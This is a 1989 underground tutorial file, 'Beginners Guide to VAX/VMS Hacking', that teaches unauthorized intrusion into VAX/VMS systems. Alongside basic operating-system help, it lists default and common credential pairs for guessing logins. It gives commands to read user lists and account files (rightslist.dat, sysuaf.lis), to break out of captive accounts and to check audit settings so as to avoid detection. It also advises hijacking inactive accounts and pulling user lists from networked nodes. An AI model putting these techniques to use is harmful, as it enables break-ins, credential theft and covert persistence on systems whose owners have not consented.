+----------------------------------------------------------------------------+
! Beginners Guide to VAX/VMS Hacking !
! !
! File By ENTITY / Corrupt Computing Canada (c) 1989 !
! !
! !
! CORRUPT COMPUTING CANADA! !
! !
! CALL: (416)/398-3301 Login: Guest, PW: Guest !
! (416)/756-4545 type !! Login: lynx !
! !
+----------------------------------------------------------------------------+
! !
! You may freely distribute this file as long as no modifications of any !
! form are made to the file. All rights reserved by...What rights?! !
! !
! !
+----------------------------------------------------------------------------+
September 12,1989
INTRODUCTION
------------
Perhaps the most exciting Operating system to HACK on is VAX/VMS.
It offers many challenges for hackers and boasts one of the best security
systems ever developed. In comparison to the security on UNIX, VMS is far
superior in every respect. It can be very difficult to get inside such a
system and even harder to STAY inside, but isn't that what this is all about?!
I have written this file as a way for beginning hackers to learn about the VMS
operating system. There is such a vast amount of information that can be
related about VAX/VMS hacking that it is not possible for me to cover
everything in just one file. As such i will try and stick to the basics for
this file and hopefully write another file in the future that deals with
heavy-duty kernal programming, the various data structures, and system service
calls. All right so lets get at it!
GETTING IN
----------
First of all how do you recognize a VAX when you see one?! Well the
thing that always gives a VAX away, is when you logon you will see:
Username:
It may also have some other info before it asks you for the username, usually
identifying the company and perhaps a message to the effect of:
Unauthorized Users will be prosecuted to the fullest extent of the law!
That should get you right in the mood for some serious hacking! Ok so when you
have determined that the system you have logged into is indeed a VAX, you will
have to at this point enter your SYSTEM LOGIN. Basically on VAX's there are
several default logins which will get you into the system. However on MOST
systems these default logins are changed by the system manager. In any case,
before you try any other logins, you should try these (since some system
managers are lazy and don't bother changing them):
Username Password Alternate
-------------------------------------------------------------------------------
SYSTEM MANAGER OPERATOR
FIELD SERVICE TEST
DEFAULT DEFAULT USER
SYSTEST UETP SYSTEST
DECNET DECNET NONPRIV
That's it. Those are the default system users/passwords. The only ones on the
list that are GUARANTEED to be in the userlist are SYSTEM and DEFAULT. However,
I have never come across a system where these two haven't been changed from
their default passwords to something else. In the above list, the alternate
password is simply a password many operators set the password to from the
deafult. So if the first password doesn't work, try the alternate password. It
should be noted when the a user is added into the system, the default password
for the new user the SAME as his username. You should keep this point in mind
because it is VERY important. Most of the accounts you hack out, will be found
in this way! Ok if above ones don't work, then you should try these accounts.
These following accounts are NOT defaults, but through experience i have found
that many systems use these accounts or some variation thereof:
Username Password
---------------------------
VAX VAX
VMS VMS
DCL DCL
DEC DEC *
DEMO DEMO *
TEST TEST *
NETNONPRIV NONPRIV *
NETPRIV PRIV
ORACLE ORACLE *
ALLIN1 ALLIN1 *
INGRES INGRES *
GUEST GUEST *
GAMES GAMES
BACKUP BACKUP *
HOST HOST
USER USER *
DIGITAL DIGITAL
REMOTE REMOTE *
SAS SAS
FAULT FAULT
USERP USERP
VISITOR VISITOR
GEAC GEAC
VLSI VLSI
INFO INFO *
POSTMASTER MAIL
NET NET
LIBRARY LIBRARY
OPERATOR OPERATOR *
OPER OPER
The ones that have asterisks (*) beside them are the more popular ones and you
have a better chance with them, so you should try them first. It should be
noted that the VAX will not give you any indication of whether the username
you typed in is indeed valid or not. Even if you type in a username that does
not exist on the system, it will still ask you for a password. Keep this in
mind because if you are not sure if whether an account exists or not, don't
waste your time in trying to hack out its password. You could be going on a
wild goose chase! You should also keep in mind that ALL bad login attempts are
kept track of and when the person logs in, he is informed of how many failed
attempts there were on his account. If he sees 400 login failures, I am sure
that he will know someone is trying to hack his account.
THE BASICS
----------
Ok i am assuming you tried all the above defaults and managed to get yourself
into the system. Now the real FUN begins! Ok first things first. After you log
in you will get some message about the last time you logged in etc. If this is
the first time you have logged into this system then you should note the last
login date and time and WRITE IT DOWN! This is important for several reasons.
The main one being that you want to find out if the account you have just
hacked is an ACTIVE or INACTIVE account. The best accounts are the inactive
ones. Why?! Well the inactive accounts are those that people are not using
currently, meaning that there is a better chance of you holding onto that
account and not being discovered by the system operator. If the account has
not been logged into for the last month or so, theres a good chance that it
is inactive. Ok anyhow once your in, if you have a normal account with access
to DCL you will get a prompt that looks like:
$
This may vary from machine to machine but its usually the same. If you have a
weird prompt and would like a normal one, type:
$set prompt=$
If this is the first time you have hacked into this system there are a couple
of steps you should take immediately. First type:
$set control=(y,t)
This will enable your break keys (like ctrl-c) so that you can stop a file or
command if you make a mistake. Usually ctrl-c is active, but this command will
insure that it is. (Note: in general to abort a command, or program you can
type ctrl-c or ctrl-y) Ok anyhow, the next step is to open the buffer in your
terminal then type:
$type sys$system:rightslist.dat
This will dump a file that has all the systems users listed in it. You may
notice a lot of weird garbage characters. Don't worry about those, that is
normal. Ok after this file ends and you get the shell prompt again ($) then
save the buffer, clear it out and leave it open. Then type:
$show logical
Ok after this file is buffered save it also. Ok at this point you have two
files on your disk which will help you hack out MORE accounts on the system.
For now, lets find out how powerful the account you currently hacked into is.
You should type:
$set proc/priv=all
This may give you a message telling you that all your privileges were not
granted. That's ok. Now type:
$show proc/priv
This will give you a list of all the privileges your account is set up for.
Usually most user accounts only have NETMBX and TMPMBX privs. If you have
more than these two, then it could mean that you have a nice high-level user.
Unlike UNIX which only has a distinction between user and superuser, VMS has
a whole shitload of different privileges you can gain. The basic privs are as
follows:
PRIVILEGE DESCRIPTION
------------------------------------------------------------------------------
NONE no privilege at all
NORMAL PRIVS
------------
MOUNT Execute mount volume QIO
NETMBX Create network connections (you need this to call out!)
TMPMBX Create temporary mailbox
GROUP PRIVS
-----------
GROUP Control processes in the same group
GRPPRV Group access through SYSTEM protection field
DEVOUR PRIVS
------------
ACNT Disable accounting
ALLSPOOL Allocate spooled devices
BUGCHK Make bugcheck error log entries
EXQUOTA Exceed disk quotas
GRPNAM Insert group logical names n the name table
PRMCEB Create/delete permanent common event flag clusters
PRMGBL Create permanent global sections
PRMMBX Create permanent mailboxes
SHMEM Create/delete structures in shared memory
SYSTEM PRIVS
------------
ALTPRI Set base priority higher that allotment
OPER Perform operator functions
PSWAPM Change process swap mode
WORLD Control any process
SECURITY Perform security related functions
SHARE Access devices allocated to other users
SYSLCK Lock system-wide resources
FILES PRIVS
-----------
DIAGNOSE Diagnose devices
SYSGBL Create system wide global sections
VOLPRO Override volume protection
ALL PRIVS
---------
BYPASS Disregard protection
CMEXEC Change to executive mode
CMKRNL Change to kernal mode
DETACH Create detached processes of arbitrary UIC
LOG_IO Issue logical I/O requests
PFNMAP Map to specific physical pages
PHY_IO Issue physical I/O requests
READALL Possess read access to everything
SETPRV *** ENABLE ALL PRIVILEGES!!! ***
SYSNAM Insert system logical names in the name table
SYSPRV Access objects through SYSTEM protection field
Ok that's the lot of them! I will explain some of the more important privileges
later in the file. For now, at least you can see just how powerful the account
is. It should be noted that most accounts usually are only granted the TMPMBX
and NETMBX privileges, so if you don't have the others, don't fret too much.
GENERAL TERMINOLOGY
-------------------
I think that i should clarify some of the basic concepts involved with
VAX/VMS operating systems before we go any further:
PROCESS: this is what is created when you log in. The system sets aside CPU
time and memory for you and calls it a process. Any task that is run
in VMS is called a process.
SUBPROCESS: also known as child-process, this is just a process that was
created by another process.
DCL : Digital Command Language. This is the shell ($) that you are put into
when you log into a VAX
MCR : an alternate shell that is used (rarely) on certain accounts. Login
prompt is a > as opposed to DCL which gives a $
SHELL : this is the '$' that you see once you are logged in. This is your
interface with the system, where you can enter the various commands
execute files and perform other activities.
JOB : a process and a group of its subprocesses performing some task
SPAWN : this is the actual command that allows you to create subprocesses
'SPAWNING' is the act of creating subprocesses
PID : process identification number. This is an 8 byte ID code that is
uniquely given to each process that is created on the system.
IMAGE : this is an EXE file that you can execute (ie run)
UIC : User identification code. This is in two parts, namely: [group,member]
The way this works is that users in the same group can access each
others files through the group protection code. However since the UIC
MUST uniquely identify each user, the member portion separates the
individuals in each group. If an account does not have a different
member number, he will NOT be put in the RIGHTSLIST database.
CONTROL KEYS
------------
A brief note on control sequences. Several different actions can be activated
via control sequences. They are:
CTRL-H :delete last character
CTRL-B :redisplay last command (can go back up to the last 20 commands issued)
CTRL-S :pause display
CTRL-Q :continue after pause
CTRL-Z :*EXIT* use to break out of things such as CREATE and EDIT
CTRL-C :*CANCEL* will exit out of most operations
CTRL-Y :*INTERRUPT* will break out of whatever you are doing
CTRL-T :print out statistical info about the process
NOTE: sometimes upon login, the CTRL-Y, CTRL-C keys are disabled. To ensure
these are enabled, issue this command upon login:
$ SET CONTROL
-------------------------------------------------------------------------------
NOTE: all the commands that are executed from DCL can be referenced from an
online help manual. To access this, simply type help at any '$' prompt
This help is also available within the various utilities and programs
such as authorize and mail. The two MOST important commands are SET and
SHOW. These should be buffered and printed out for your own reference.
-------------------------------------------------------------------------------
FILES and DIRECTORIES
---------------------
The directory structure of VMS is a heirarchical one similar to MS-DOS and
UNIX. Its a simple concept, and i will only briefly skim over it. First of all
it should be noted that there may be more than one hard drive or other
mass-storage device hooked up to your system. Within each hard drive there is
the ROOT directory. This is the highest directory in the tree and is referenced
by [000000]. (this will be explained in a minute) Within the root there are
several subdirectories. Within these subdirectories there may be files and even
further subdirectories. The concept is quite simple, but can be difficult to
explain. Here is a diagram to give you a rough idea of how it is set up:
[000000] <--root directory
!
!
+--------------------------+---------------------------------+
! ! !
! ! !
[d1] [d2] [d3]
! ! !
+-----+--------+ +-----+-----+ +--------+
! ! ! ! ! ! !
! ! ! ! ! [d3.d3a] [d3.d3b]
[d1.da] [d1.db] [d1.dc] [d2.d2a] [d2.d2b]
! ! !
! ! +--+-----------+
[d1.db.db1] [d2.d2a.d2a1] ! !
[d2.d2b.d2b1] [d2.d2b.d2b2]
Hopefully this will give you some sort of an idea of how the directories
can be structured. Within each subdirectory there may be other files also. For
example to see the directory after you log in you would type:
$dir
a sample result may be:
Directory DISK$SCHOOL:[REPORTS.JOHN]
average.com;3
generate.exe;1
mail.mai;10
marks.dat;4
marks.dat;5
reportcard.dir
projects.dir
Total 7 files.
What does this tell you? The first line tells you what drive and subdirectory
you are in. The next lines are the actual files. As you can see each file has
a 3 character extension, followed by a comma and a number. The name before the
period is the actual filename (eg. average) the 3 characters after the period
is known as the extension (eg.com) and the number after the comma refers to the
version of the file. So in this case, this is version number 3. Any time you
modify or save a file, it automatically assigns it a version number of 1. If
file already exists on your disk, it increments the version number by 1 and
then saves it as such. So the next time i go ahead and save the file
average.com, it would add another file to the list called average.com;4
Special note should be taken of the files that have an extension of '.DIR'
These are not really files, but rather subdirectories. I will show you how to
switch subdirectories in just a minute. First you should take note of the
different file extensions. Although you can name the files anything you want
some of the more important extensions are:
TYPE DESCRIPTION
-------------------------------------------------------------------------------
EXE Executable IMAGE. These files are programs that can be RUN
COM DCL SCRIPT files. These can also be executed, utilizing the @ command
DAT DATA file. Sometimes useful things to look at.
LIS Listing File, many times important info is in here
MAI Mail file, use the MAIL command to read these
DIR DIRECTORY - not a file
JOU Journal File, often created thru the use of other programs eg EDIT
TXT Text Files, often hold useful information.
These are just some of the extensions you are most likely to see. The two
important ones are the EXE and COM files. These can be executed from the DCL
level. EXE files are executed via the RUN command. Eg. to run authorize.exe:
$run authorize
This will run the authorize IMAGE. Supposing there were more than one version
of authorize you could specify a version number. eg.
$run authorize.exe;4
The other type of file you can run is the COM files. These are like SCRIPT
files in UNIX or .BAT files from MS-DOS. They are just a sequence of DCL
commands strung together that are executed when you initiate the file. To run
COM files, use the @ command. For example to run adduser.com, type:
$@adduser
The version number thing i stated for EXE files also applies for COM files.
***NOTE*** To get a listing of all the files on the whole drive, try this:
$sd [000000]
$dir [...]*.*
Similarly you type dir [...]*.com, if you wanted just the COM files listed.
To see the contents of a file, you can use the TYPE command. For example:
$type login.com
this might type out something like:
$ sd:==set default
$ set control=(y,t)
$ set proc/name=entity
$ set term/dev=vt100
:
:
:
etc
This is great for COM files, DAT files and some of the other types, but you
will always get garbage when you type EXE files so don't bother trying those.
This is very useful for snooping around other peoples files and getting
information. Many times i have found user/passwords lying around in TXT or
LIS files left by some careless user.
Now, how do you go about changing directories? Well, first you should set up
a shortcut. The normal command to change directories is SET DEFAULT. For
example to change to a subdirectory called REPORTS, you would have to type:
$set default [.reports]
To make life simpler on yourself, as soon as you log in, you should type:
$sd:==set default
This defines a macro called SD that is interpreted by DCL as SET DEFAULT. You
can similarly define other 'favorite' commands to some short, easy to remember
definition. Anyhow heres the syntax for changing directories:
SD DEVICE:[dir1.dir2.dir3....]
The device can be optionally left out, if you plan to remain in the same hard
drive. You have to then enter a '[' followed by the root directory, followed
by a period, followed by another subdirectory name etc. Eg.
$sd dub0:[cosy.users]
Suppose at this point, you were in directory cosy, subdirectory users and there
was a further subdirectory called 'info.dir'. Rather than specify the full
pathname, you can simply type:
$sd [.info]
This will advance you one level into the info subdirectory. Remember to put the
period in front of the subdirectory. If you don't, in this case it would assume
that you were trying to reference the root directory called info. Another
important thing to note is moving back levels in terms of subdirectories. For
example if you were in [cosy.users.info] and wanted to move back to
[cosy.users] you could type:
$sd [-]
Similarly you can put in as many hyphens (-) as you want to move back. For
example sd [--] would put you back to the cosy directory.
Another important thing to note about subdirectories are logical assigned
symbols. These are names assigned to certain things. For example the main
system directory is called sys$system. So to go to it you could type:
$sd sys$system
This would throw you into the system directory. Similarly you can type:
$sd sys$login
and this will put you back into the directory that you were initially in, when
you first logged in. These symbols stand for actual device:directory
combinations. To see the various definitions that are assigned to each process
you should type:
$show logical
This will list a whole bunch of global system equates that you can use to
access various parts of the VAX structure. In addition to view all of your
locally defined symbols, use:
$show symbol *
FILE PROTECTION
---------------
Ok before i begin this, let me just state that whatever i say about files also
applies to directories. There are four types of file protections. There is
SYSTEM,WORLD,GROUP and OWNER. These are briefly:
SYSTEM- All users who have group numbers 0-8 and users with physical or logical
I/O privileges (generally system managers, system programmers, and
operators)
OWNER - the owner of the file (or subdirectory), isolated via their User
Identification Code (UIC). This means the person who created the file!
GROUP - All users who have the same group number in their UICs as the owner of
the file.
WORLD - All users who do not fall in the categories above
Each file has four types of protection within each of the above categories.
They are: Read, Write, Execute, Delete. Explanations are:
READ - You can read the file and copy it.
WRITE - You can modify and rename that file.
EXECUTE- You can run the file
DELETE - You can delete the file
When you create a file the default is that you have all the privileges for that
particular file. Group, world and system may only have limited privileges. This
can be changed with the set protection DCL command. For example:
$set protection=(group:rwed,world:r)/default
would set your default protection to allow other users in your group to have
full read,write,execute,delete privs to the file, and others only read access
to the file. The /default means that from now on all the files you create will
be set with this particular protection. To change one of your own files to
some other protection you can alternatively use:
$set prot topsecret.dat /prot=(system:rwed,group:rwed,world:rwed,owner:rwed)
This would enable all users on the system to access the file 'topsecret.dat'
When specifying the protection, you do not have to list them for each of the
four groups. You can simply choose only those that you want changed from your
default.
EDITING FILES
-------------
An important utility that all VAX hackers should be familiar with is the EDT
text editor. To call it up, use the EDIT DCL command. ie:
$edit [filename]
This will invoke the EDIT/EDT text editor. The [filename] refers to the file
that you want to edit. If the file does not exist, it is created at this point.
The EDT editor does not provide a default file type when creating files, so if
you do not specify one, it will leave it as NULL. It should be noted that there
is more than just the EDT editor, but when you type in EDIT, the default is
/EDT. Basically it is an editor that you can use to create/modify COM or any
other type of text files.
After the editor is invoked, it keeps track of everything that you enter in a
JOU file. In case of lost carrier or some other accident, you can recover what
you had by specifying the /RECOVER qualifier. For example:
$edit/recover memo.dat
This would take the last copy of memo.dat, load it into memory, then process
your last JOU file, updating it to virtually exactly where you were before you
got cut off. Journaling is automatically defaulted to ON, but can be turned
off with the /NOJOURNAL qualifier. For a description of what all the qualifiers
are, and what they do, refer to the online HELP manual.
Ok here is a list of the basic commands you can perform in the EDT editor:
--------------------------------------------------------------------------------
X (where X = line number)............show line X only
X:Y (where X,Y = line numbers).........show line X through line Y
A,B,C,D (a,b,c,d = line numbers).......list lines A,B,C,D
X:e ...................................list from X to end
T W ...................................TYPE WHOLE. List ALL of the text lines
S/string1/string2/W....................substitute ALL occurrences of string1
for string2 as they occur from current
line number downwards
"string" ..............................search for first occurrence of string
from current line downwards
T A "string" ..........................type all occurrences of string from
current line downwards
X:Y a "string" ........................search for occurrences of string within
range denoted by X through Y
D X ...................................Delete line X
D X:Y .................................Delete line X through Y, inclusively
I .....................................insert a line
I X ...................................insert from line X
M X:Y to Z ............................move lines X through Y to line Z
RES ...................................resequence line numbers
RES/SEQ:X:10 ..........................resequence from line X in intervals of 10
R X ...................................replace from line X. This deletes the
current line and automatically goes into
insertion mode.
EXIT ..................................leave the editor, and SAVE the current
text.
QUIT ..................................leave the editor and DO NOT SAVE the
current text.
--------------------------------------------------------------------------------
A sample editing session is shown:
$edit lame.txt
* i
hi this is just some bullshit text to test out how this EDIT program
works. Oh well, easy enough. bye!
<hit ctrl-z>
*exit
$type lame.txt
hi this is just some bullshit text to test out how this EDIT program
works. Oh well, easy enough. bye!
$del lame.txt;*
COMMANDS
--------
In this section i will outline some of the more important commands that you can
issue from the DCL level. This is not meant to be a complete guide. I will
merely point out some of the more important commands and a very brief
description. Proper help can be obtained from the online HELP facility.
NOTE: It should be noted that each of the following commands may have further
----- qualifiers that you can specify. You should check up on these from the
online help also.
@ -Lets you execute COM script files
ACCOUNTING -allows you to view and edit system accounting data that keeps
track of what system time you have racked up.
ANALYZE -lets you view the contents of OBJ files in HEX/ASCII format.
ANALYZE/SYSTEM -Invokes the SDA. VERY VERY USEFUL!! Allows you to view other
running processes, their type-ahead buffers etc.
APPEND -appends the contents of file1 to file2
ATTACH -allows you to attach yourself to one of your subprocesses
CLOSE -closes a file that was opened for input/output via OPEN
CONTINUE -continue a process that you have aborted with control-y
COPY -copy file1 to file2. You can specify full pathnames, with
device and subdirectory. If you want to copy it to your home
directory just use sys$login as your 'TO' file.
CREATE -create a text file of any type. Eg. you want to create a
simple COM file or perhaps a letter to another hacker on the
system. (you shouldn't be using MAIL to send messages!)
CREATE/DIR -If you want to create a subdirectory
DELETE -delete a filename. Remember to specify a version number when
you are deleting a file or it wont work.eg. del garbage.com;1
DELETE/INTRUSION_RECORD -gets rid of the failed password attempts
DIFFERENCES -compares two files and notifies you of their differences
DIRECTORY -get a directory of the files. Various qualifiers can be chosen
DUMP -get a hex/ascii file dump
EDIT/EDT -invokes the VAX EDT interactive text editor
EXAMINE -view the contents of virtual memory
HELP -ONLINE HELP MANUAL. REFER TO IT OFTEN!
LINK -link object files into EXE files that you can run
LOGOUT -the proper way to terminate a session
PHONE -Allows you to chat with another user on the system. It is not
recommended that you use this, except with fellow hackers.
RENAME -rename a file or directory
RUN -lets you execute EXE files
SET CONTROL -disables/enables interrupts via ctrl-y/ctrl-c
SET DEFAULT -change directories
SET HOST -allows you to connect to another mainframe
SET PASSWORD -change the password of your account
SET PROCESS -change the characteristics of your process
SET PROMPT -change the prompt ($)
SET TERMINAL -change your terminal characteristics
SHOW ACCOUNTING -show the current security/accounting enabled
SHOW AUDIT -show SECURITY enabled
SHOW DEFAULT -see your current directory. (Like PWD in UNIX)
SHOW DEVICES -check out the system setup
SHOW INTRUSION -view the contents of the breakin database
SHOW LOGICAL -current logical name assignments
SHOW NETWORK -lists all the available nodes that you can connect to
SHOW PROCESS -View your process settings
SHOW PROTECTION -show the default protection you have set
SHOW SYSTEM -useful to see the running processes
SHOW TERMINAL -display your terminal characteristics
SHOW USERS -see who else is logged in.
SPAWN -spawn a subprocess
STOP -kill off a subprocess
TYPE -view a file
This should give you a general overview of some of the more important
commands that you can use. It would be impossible for me to list ALL the
commands, and their descriptions, so i suggest that you go through the online
HELP facility and familiarize yourself with the syntax of some these commands.
HACKING
-------
Up to this point i have mainly discussed the basic concepts involved with VMS.
By now you should be familiar and comfortable with the various DCL commands
and how to accomplish certain tasks. If you are still sketchy, go back and
re-read the sections you don't understand. You may also want to log into a VAX
and just try fiddling around in the shell getting used to how the whole thing
works.
In this section i will discuss some of the techniques that you may find useful
in hacking out accounts, calling out to remote systems, and gaining access to
confidential information.
Lets start from the top: When you first login to the system, after it accepts
your password etc, it executes the SYLOGIN.COM file. Then it searches your
default directory for the file LOGIN.COM (this may be changed by the system
manager if he wishes) This file basically sets up your terminal parameters and
perhaps some macros that you wish to be defined. It may or may not also execute
some utility.
BYPASSING LOGIN.COM
-------------------
Sometimes it may be useful to be able to skip the login procedures. For
example if the system automatically runs some file as soon as you log in, and
doesn't put you into the shell, this technique can be used:
Username: entity/nocomm
Assuming the user was named entity, if you put a /nocomm qualifier, it will
skip the login.com file and put you directly into DCL. Similarly you can
specify some other file you want executed instead of login.com. eg.
Username: entity/comm=custom.com
This will execute the custom.com file upon entry into the account. It should
be noted that these methods WILL NOT WORK on a CAPTIVE account. What is a
captive account?! Read on...
CAPTIVE ACCOUNTS
----------------
Many times, in an attempt to make an account more secure the system manager
sets the captive flag to ON, in the users profile. What this means is that
when you log in, you cannot break out of the login file into the DCL shell.
This means that although you can hit ctrl-y and it may even say *interrupt*
it will not actually abort the file. So how do you exit to DCL?! Well there
are a few ways. Usually accounts set up in this manner are used to allow the
user to connect to other nodes. If this is the type of account that you have
logged into then try the following: First choose an option from the menu that
they present that allows you to call any node. When it says something like
%connected to... then hit two ctrl-y in quick succession. It will then ask
you if you want to really abort the current session. Type Y and it will put you
at a prompt that looks like:
PAD>
At this point you should type in SPAWN and it will spawn a process and throw
you into the DCL Shell. This is a major security flaw in VMS and can be put to
good use on many a system.
GAINING PRIVILEGES
------------------
On most systems that you hack into, you will find yourself with only TMPMBX and
NETMBX privileges. To see your privs type:
$show proc/priv
These however may not be all the privileges that you have assigned. Upon login,
the system only assigns you your default privileges. On some accounts you may
have more than just these privileges. To see if you do, type:
$set proc/priv=all
if this doesn't give you any error message then you have found yourself a
SYSTEM account! With this account you can create new users, change the security
setup read other peoples files etc. Here are a list of some of the more
important privileges and what they can be used for:
CMKRNL -change to kernal mode. Very Powerful privilege!!
SETPRV -allows you to become a Super-User. You can do whatever you want!
READALL -allows you to read other peoples files and directories regardless
of the protection
OPER -allows you to perform many useful operator functions (security etc)
SYSPRV -You can gain the same UIC as the system and access just about
anything you want. Create/modify accounts
NETMBX -allows you to call out on the network to other systems
BYPASS -this allows you to view network passwords, and to bypass all types
of protection fields
These are just some of the more important ones to the hacker. For a complete
list of all the privileges and what each one does, see the list i presented
earlier in the file.
One important note: It is not possible to gain privileges that are not set up
in your default from the DCL level. There is one way to gain ALL privileges on
ANY Vax but it involves some serious kernal programming. I could outline the
program here but i chose not to. The reason for this is that many people would
abuse the system if they had access to wiping out hard drives and totally
trashing the system. If you work from the ground up, you begin to realize just
how important gaining extra access is. You begin to respect the VMS system for
what it is. A system account in the hands of novice is a very dangerous thing
indeed, and my suggestion is that if you have a SYSTEM account that has more
than just the default privileges that you should disable them. This will only
help you from making any mistakes and screwing up the system. To do this type:
$set proc/priv=noall
$set proc/priv=(tmpmbx,netmbx,readall)
With these privileges you should be able to easily navigate throughout the
system without messing anything up. Keep one thing in mind, don't delete files
unless you have created them! People will notice things like this and you are
guaranteed to lose your account.
Once you are an experienced hacker you may wish to create a program that gives
you more privileges. To get you started in this direction i will give you
an excerpt out of the 'VAX/VMS internals and data structures' manual:
If a process wishes a privilege that is not in its authorized list, one of two
conditions must hold or the requested privilege is not granted.
1)The process must have SETPRV privilege. A process with this privilege can
acquire any other privilege with either the set privilege system service or
DCL command SET PROCESS/PRIVILEGES.
2)The system service was called from executive or kernal mode. This mechanism
is an escape that allows either VMS or user-written system services to
acquire whatever privileges they need without regard for whether the calling
process has SETPRV privilege. Such procedures must disable privileges
granted in this fashion as part of their return path.
That should give you an idea of what is necessary to go about writing a program
that grants you extra privileges. For those advanced programmers, here is the
relevant information:
Symbolic name Location Usage Referenced By
---------------+------------------+------------------------------+-------------
PHD$Q_PRIVMSK !process header !working privilege mask !system srvc's
PCB$Q_PRIV !PCB !same as phd$q_privmsk !device driver
CTL$GQ_PROCPRIV!P1 Pointer page !permanently enabled privs !SET UIC
PHD$Q_AUTHPRIV !process header !procs allowable privs !$setprv
PHD$Q_IMAGPRIV !process header !mask for enhanced priv images !$setprv
UAF$Q_PRIV !sysuaf.dat !UAF allowable privs !LOGINOUT
KFI$Q_PROCPRIV !priv install image!image installed with privs !image actvatr
IHD$Q_PRIVREQS !image header !unused - set for all privs! !image actvatr
---------------+------------------+------------------------------+-------------
ONLINE SECURITY
---------------
Version 4.2 of VMS introduced the security auditing features. These features
can be used to track down hackers and illegal use of the machine. Things such
as access to files, login failures, process creation, adding users etc can all
be monitored and logged. After you have logged into an unknown system, it is
wise to check what kind of security they have enabled on the system. This is
done in two ways. First you should try:
$show accounting
Normally this will either say accounting is disabled or will have a list of
items that are being monitored. This is used mainly for charging the users for
CPU time etc. What you should check for in this list is if IMAGE accounting
is enabled. If it isn't, then you can relax. If it is, you know that you have
a smart system manager here and you will have to take extra precautions when
fiddling around on this machine. The second thing you should check is the
actual level of security enabled. Generally this feature is disabled, and you
have nothing to worry about. To see the security type:
$show audit
One thing to note is that you must have the SECURITY privilege to issue this
command. An especially secure system may have things such as breakins, logins,
logfailures, file access (both successes and failures),and authorization
checks. These systems require a tremendous amount of care, and are not a good
place to start learning about VMS.
Another important thing that you should keep in mind is that VAX/VMS stores
information about login failures (invalid password, account expired, unknown
username). A security manager can identify possible breakin attempts by using:
$show intrusion/type=intruder
This command requires the CMKRNL and SECURITY privileges. An interesting thing
to note is that the system manager can have the VAX do certain things after it
has determined that the user trying to log in is not legitimate. For example
it can block all login attempts from a certain terminal, or it could turn off
accepting passwords for a certain account for a specified period of time. So
lets suppose you were hacking an account and after 10 tries actually entered
the right password. If the intrusion alert is set at 5 tries, then even if you
enter the correct password, it wont let you in!!
EXPIRED PASSWORDS
-----------------
I want to make a quick note here about expired passwords. Often you will find
after logging into an account that it will say that your password has expired
and for you to enter a new password. At this point you should check when was
the last date of access. If it was only a few days ago, then you should forget
about this account. If it more than a few weeks ago, then you have found your-
self an INACTIVE account (ie one that is not in use anymore) The first thing
that you should do is set a new password. For example:
$set password
Passwords can be from 1-31 characters in length and can contain the following
characters:
A-Z
a-z
0-9
$ (dollar sign)
_ (underscore)
Note that uppercase, and lowercase are not differentiated (unlike UNIX). The
reason that you should enter a password at this point is that if you don't, the
next time the account will not let you log in since the password has expired.
GAINING MORE ACCOUNTS
---------------------
Once you have managed to hack onto a VAX, often you will want to gain more
accounts on the system. There are several ways to go about doing this. The
first way is to get a list of all the users on the system. Remember that the
default password for any account is the same as the username. Well if you have
a list of users, theres a good chance you may find a few who haven't bothered
to change their passwords. There are a few methods of viewing the userlist.
The simplest, but least readable way is to:
$type sys$system:rightslist.dat
and buffer the incoming information. You will notice some garbage characters
also sent through. The way this file is set up is a 1-2 byte character ID
followed immediately by a 32 byte string with the username. So to pick out the
usernames, simply ignore the first character from each name, and then you have
the usernames. There is one small problem to this. Sometimes the character ID
in front of the name is a SPACE. In this case, you would still skip the first
character (which is a space), but in viewing the name you would take all the
characters. So you just have to use your judgement when looking at this list
to determine whether the string is the whole name, or whether it has an ID
code stuck in the beginning. The problem is that the ID code is not necessarily
a garbage character, it could be any valid ascii character (spaces,letters,
numbers etc) The thing that you should keep in mind is that these ID codes are
grouped together, so you may see several names that all start with 'A' and you
can assume that this is the ID and not part of the actual name.
Another method which is a bit slower, but a lot neater is to use the DUMP
command on the rightslist file:
$dump sys$system:rightslist.dat
This is quite useful, because it automatically strips away control characters,
and puts each name into a separate record which makes it easy to isolate the
proper login names.
An alternative method is to run the psi$authorize file from the system dir.
To do this, type:
$mc psiauthorize
When you get the PSI-authorize prompt, type:
PSI-authorize> show /id *
This will list all the users on the system. The drawback to this method is that
the system that you are on, may have taken out the PSI utilities from the
system directory. The PSI utilities are used mainly for remotely connecting
to other mainframes.
A third method to get a listing of all the users is to go through the sysuaf
database. On most accounts this is usually not possible , since most users do
NOT have read/write access to sysuaf.dat. If you DO have access to this file
(ie you have readall or setprv etc) then you can run authorize:
$sd sys$system
$run authorize
Then when you get the UAF prompt, type:
UAF>show [*,*] /brief
The added bonus of doing it this way is that you can also find out things such
as the users home directory, when was the last time they logged in, what their
privileges are etc. Easy to isolate the good accounts on the system that you
may want to hack at. It should be noted however, that if you CAN perform this
command, then you also have the priv's to create your own user, or better yet
change the password on an inactive account.
There is another possibility that sometimes works on many systems. Often, the
system manager uses the LIST command from AUTHORIZE and what it does is produce
a user listing in the file called: SYSUAF.LIS in the SYS$SYSTEM directory. If
he has done this, unless he explicitly changes the protection on the file, this
file has WORLD READ access. In other words, anyone can go in and type out the
file. To do this try:
$type sys$system:sysuaf.lis
Ok so lets assume that you have used one of these methods and have come up
with a list of all the users on the system. Now comes the tedious part. What
you have to do is log back into the system, and try each of the names out. For
the password, enter the same thing as you did for the username. This is a long
and boring process depending on how large the userbase is, but it usually
yields a few good accounts.
Another interesting variation on this, is to get accounts on remote nodes that
are linked with your VAX. To see other nodes that are accessible from your
VAX, type:
$show net
This will produce a listing like:
VAX/VMS Network Status for local node 2.161 NORTELCOM on 01-SEP-1989
The next hop to the nearest area router is node 2.62 BELCAN
Node Links Cost Hops Next Hop to Node
2.161 NORTELCOM 0 0 0 Local -> 2.161 NORTELCOM
2.6 JANUS 0 3 3 UNA-0 -> 2.6 JANUS
2.2 LUMPY 0 9 5 UNA-0 -> 2.2 LUMPY
2.3 SBSU 0 5 4 UNA-0 -> 2.3 SBSU
2.4 AURORA 0 4 4 UNA-0 -> 2.4 AURORA
Total of 5 nodes.
This is a sample output that you would see on your screen. Let me give a brief
explanation of what each column means. The first column shows the node address
and the NodeName. The node name is the most important to the VAX hacker since
that is how you will be contacting the remote node. LINKS shows the number of
logical links between the local node and each available remote node. COST shows
the total line cost of the path to a remote node. HOPS shows the number of
intermittent nodes plus the target node. NEXT HOP TO NODE shows the outgoing
physical line used to reach the remote node.
The important item from this list of course is the node name. By referencing
this you can connect to other nodes. A nice technique that allows you to get
user accounts on other nodes without actually having access to the node employs
this idea. For example, if you want to find out the user list of a node SBSU,
you could type:
$copy sbsu::sys$system:rightslist.dat sys$login
